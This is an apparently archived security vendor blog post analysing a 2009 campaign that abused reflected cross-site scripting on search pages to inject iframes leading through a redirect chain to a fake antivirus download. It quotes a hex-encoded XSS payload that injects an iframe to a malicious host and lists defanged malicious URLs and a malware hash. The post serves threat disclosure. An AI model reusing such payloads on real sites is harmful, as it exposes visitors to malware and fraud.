XSS Embedded IFrames

dicembre 14, 2009 - 2 Minuti di lettura

Contenuto

Article
Altri blog

Today we saw a variety of pages being advertised that have search.htm and other pages vulnerable to cross-site scripting (XSS) being used to inject an iframe to a malicious webpage redirector. To an unknowing user following such an advertisement, they would believe that they were just visiting the intended host site unaware that the iframe was also redirecting them to malicious content.

Here are a few examples with some of the malicious XSS advertisements (do not follow these or other "hxxp" URLs below):

In each of the above examples, the parameter passed to the server's .htm or .php file is a string that includes encoded HTML. When the server processes the parameter, it displays the original parameter (users usually want to see their query string) and its results. Because the original parameter is displayed on the page without any sanitization for this type of encoded HTML, it is possible for this XSS to take place. The encoded HTML in each case is hexadecimal encoded HTML:

%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%2F%2F%61%73%6B%35%2E%65%75%3E

which decodes to a closing tag for the query string, followed by the malicious iframe to embed:

 ask5.eu does a Javascript redirect using parent.location.replace() to: hxxp://alanhui.co.cc which does a Javascript parent.location.replace() to: hxxp://max-well2.cn/?pid=349s01&sid=dd93d9 which lands the user at: hxxp://windows-antivirus4.com/scan1/?pid=349s1&engine=%3DHW39TjuMDQxLjYyLjEyMyZ0aW1lPTEyNjI4NUEOOAkO and downloads: hxxp://windows-antivirus4.com/download/Inst_349s1.exe <a href="/it/sites/default/files/images/blogs/_TIeEMQaNHSw/Sycbzvtoj_I/AAAAAAAAAAk/SQXZqw9pppA/s400/Screen+shot+2009-12-14+at+11.39.02+PM.png"><img alt="Image" src="https://cms.zscaler.com/cdn-cgi/image/format=auto/sites/default/files/images/blogs/_TIeEMQaNHSw/Sycbzvtoj_I/AAAAAAAAAAk/SQXZqw9pppA/s400/Screen+shot+2009-12-14+at+11.39.02+PM.png" loading="lazy" decoding="async"/></a> Fake AV malware sample: MD5: c0d2017be29e5383b1a680ef59ed22e0 Virus Total (6/41): <a href="https://www.virustotal.com/#/file/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152">http://www.virustotal.com/analisis/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152-1260851264</a>

Grazie per aver letto

Questo post è stato utile?

Sì, molto utile!

Non proprio

Esclusione di responsabilità: questo articolo del blog è stato creato da Zscaler esclusivamente a scopo informativo ed è fornito "così com'è", senza alcuna garanzia circa l'accuratezza, la completezza o l'affidabilità dei contenuti. Zscaler declina ogni responsabilità per eventuali errori o omissioni, così come per le eventuali azioni intraprese sulla base delle informazioni fornite. Eventuali link a siti web o risorse di terze parti sono offerti unicamente per praticità, e Zscaler non è responsabile del relativo contenuto, né delle pratiche adottate. Tutti i contenuti sono soggetti a modifiche senza preavviso. Accedendo a questo blog, l'utente accetta le presenti condizioni e riconosce di essere l'unico responsabile della verifica e dell'uso delle informazioni secondo quanto appropriato per rispondere alle proprie esigenze.